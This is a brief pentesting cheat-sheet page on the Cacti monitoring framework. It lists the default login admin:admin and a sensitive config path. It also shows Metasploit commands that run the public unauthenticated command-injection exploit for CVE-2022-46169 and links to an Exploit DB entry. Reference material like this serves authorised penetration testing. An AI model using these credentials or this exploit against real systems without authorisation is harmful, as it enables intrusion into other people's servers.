# Cacti Pentesting

Cacti is a web-based network monitoring, performance, fault and configuration management framework designed as a front-end application.

### Default Credentials <a href="#default-credentials" id="default-credentials"></a>

```shellscript
admin:admin
```

### Common Directories <a href="#common-directories" id="common-directories"></a>

```shellscript
/include/config.php
```

### Remote Code Execution (RCE) CVE-2022-46169 <a href="#remote-code-execution-rce-cve-2022-46169" id="remote-code-execution-rce-cve-2022-46169"></a>

Reference: <https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution/>

```shellscript
msfconsole
msf> use exploit/linux/http/cacti_unauthenticated_cmd_injection
msf> (set options...)
msf> run
```

Also we can refer to [Exploit DB](https://www.exploit-db.com/exploits/51166).

### References <a href="#references" id="references"></a>

* [Pentest Tools](https://pentest-tools.com/vulnerabilities-exploits/cacti-remote-code-execution_CVE-2022-46169)